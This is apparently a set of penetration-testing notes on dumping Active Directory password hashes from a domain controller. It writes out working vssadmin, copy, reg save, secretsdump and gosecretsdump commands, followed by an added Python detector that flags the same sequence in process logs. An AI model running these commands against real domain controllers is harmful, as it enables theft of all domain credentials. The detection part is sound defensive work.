On Domain Controller - create snapshot with vssadmin.exe
PS C:\> vssadmin.exe create shadow /for=C:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.
Successfully created shadow copy for 'C:\'
Shadow Copy ID: {3d781b5d-e053-41ad-85d4-5b8f1ffb2d42}
Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5
NTDS:
PS C:\> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\ntds\ntds.dit c:\ntds.dit
SYSTEM:
PS C:\> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\system32\config\system c:\system
Or use reg save:
reg SAVE HKLM\SYSTEM c:\SYSTEM
You can also use ShadowCopyView if you prefer a GUI.
Delete the snapshot afterwards:
PS C:\> vssadmin delete shadows /shadow={3d781b5d-e053-41ad-85d4-5b8f1ffb2d42}
secretsdump.py can get stuck in a loop, printing the same hashes over and over. In that case (or even by preference) use Gosecretsdump.
secretsdump.py -system SYSTEM -ntds ntds.dit -hashes lmhash:nthash LOCAL -outputfile extracted-hashes -just-dc-ntlm -user-status -history
./gosecretsdump -system SYSTEM -ntds NTDS.DIT -history -status -out hashes.log
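From the defender's side, the steps above leave a very recognisable process-creation trail on the domain controller: vssadmin.exe creating a shadow, a copy of ntds.dit out of a \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN path, and reg.exe saving HKLM\SYSTEM, all on one host within minutes. The following is an added example (not part of the original notes) that correlates exactly that sequence from Sysmon Event ID 1 / Security 4688 style events. The event field names (host, time, user, cmdline), the hostnames and the timestamps are constructed for the example; the command lines are the ones from the notes above.

```python
"""Correlate process-creation events into an NTDS.dit-dump alert.

Added example, not from the original page. Event fields (host, time, user,
cmdline) mirror what Sysmon EventID 1 or Security 4688 provide; the events
and hostnames below are constructed for the example.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# The three stages of the technique as they appear in a command line.
SHADOW_CREATE = re.compile(r"\bvssadmin(?:\.exe)?\s+create\s+shadow\b", re.I)
NTDS_FROM_SHADOW = re.compile(r"HarddiskVolumeShadowCopy\d+\\.*\\ntds\.dit", re.I)
SYSTEM_HIVE = re.compile(
    r"\breg(?:\.exe)?\s+save\s+HKLM\\SYSTEM\b"
    r"|HarddiskVolumeShadowCopy\d+\\.*\\config\\system\b", re.I)


def classify(cmdline):
    """Map a command line to a stage name, or None if it is not of interest."""
    if NTDS_FROM_SHADOW.search(cmdline):
        return "ntds_from_shadow"
    if SYSTEM_HIVE.search(cmdline):
        return "system_hive"
    if SHADOW_CREATE.search(cmdline):
        return "shadow_create"
    return None


def detect_ntds_dump(events, window_minutes=30):
    """Return alerts: a snapshot followed within the window by an NTDS or
    SYSTEM read on the same host, or any NTDS read from a shadow copy path."""
    window = timedelta(minutes=window_minutes)
    by_host = defaultdict(list)
    for ev in events:
        stage = classify(ev["cmdline"])
        if stage is not None:
            by_host[ev["host"]].append((datetime.fromisoformat(ev["time"]), stage, ev))

    alerts = []
    for host, staged in by_host.items():
        staged.sort(key=lambda item: item[0])
        explained = set()  # indices already attributed to a snapshot-anchored alert
        for i, (t0, stage, ev) in enumerate(staged):
            if stage != "shadow_create":
                continue
            followups = [(j, s) for j, (t, s, _) in enumerate(staged)
                         if j > i and t - t0 <= window and s != "shadow_create"]
            names = {s for _, s in followups}
            if "ntds_from_shadow" in names:
                severity = "high"
            elif "system_hive" in names:
                severity = "medium"  # hive exported right after a snapshot; worth a look on a DC
            else:
                continue  # a snapshot with no follow-up is ordinary backup behaviour
            explained.update(j for j, _ in followups)
            alerts.append({
                "host": host, "user": ev["user"], "severity": severity,
                "stages": ["shadow_create"] + sorted(names),
                "start": t0.isoformat(),
            })
        # ntds.dit read out of a shadow copy is reportable even if no snapshot was logged
        for j, (t, stage, ev) in enumerate(staged):
            if stage == "ntds_from_shadow" and j not in explained:
                alerts.append({
                    "host": host, "user": ev["user"], "severity": "high",
                    "stages": ["ntds_from_shadow"], "start": t.isoformat(),
                })
    return alerts


# Constructed sample events: one full sequence on DC01, benign backup noise on
# FS01, and an ntds.dit read on DC02 with no snapshot creation logged.
SAMPLE_EVENTS = [
    {"host": "DC01", "time": "2024-03-01T10:00:00", "user": r"CORP\admin",
     "cmdline": "vssadmin.exe create shadow /for=C:"},
    {"host": "DC01", "time": "2024-03-01T10:01:10", "user": r"CORP\admin",
     "cmdline": r"copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\ntds\ntds.dit c:\ntds.dit"},
    {"host": "DC01", "time": "2024-03-01T10:01:30", "user": r"CORP\admin",
     "cmdline": r"reg SAVE HKLM\SYSTEM c:\SYSTEM"},
    {"host": "DC01", "time": "2024-03-01T10:05:00", "user": r"CORP\admin",
     "cmdline": "vssadmin delete shadows /shadow={3d781b5d-e053-41ad-85d4-5b8f1ffb2d42}"},
    {"host": "FS01", "time": "2024-03-01T02:00:00", "user": r"NT AUTHORITY\SYSTEM",
     "cmdline": "vssadmin list shadows"},
    {"host": "FS01", "time": "2024-03-01T02:00:05", "user": r"NT AUTHORITY\SYSTEM",
     "cmdline": "vssadmin create shadow /for=D:"},
    {"host": "DC02", "time": "2024-03-01T11:30:00", "user": r"CORP\svc-backup",
     "cmdline": r"copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\ntds.dit d:\tmp\ntds.dit"},
]

if __name__ == "__main__":
    for alert in detect_ntds_dump(SAMPLE_EVENTS):
        print(alert)
```

The window is anchored on the snapshot because a snapshot alone is what every backup agent does; the alert only fires once the same host goes on to read ntds.dit or the SYSTEM hive. A read of ntds.dit out of a shadow copy path is raised on its own, since the snapshot may have been created by another tool or the creation event may simply be missing from the collected logs.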
Example NTDS.dit and SYSTEM files zipped below.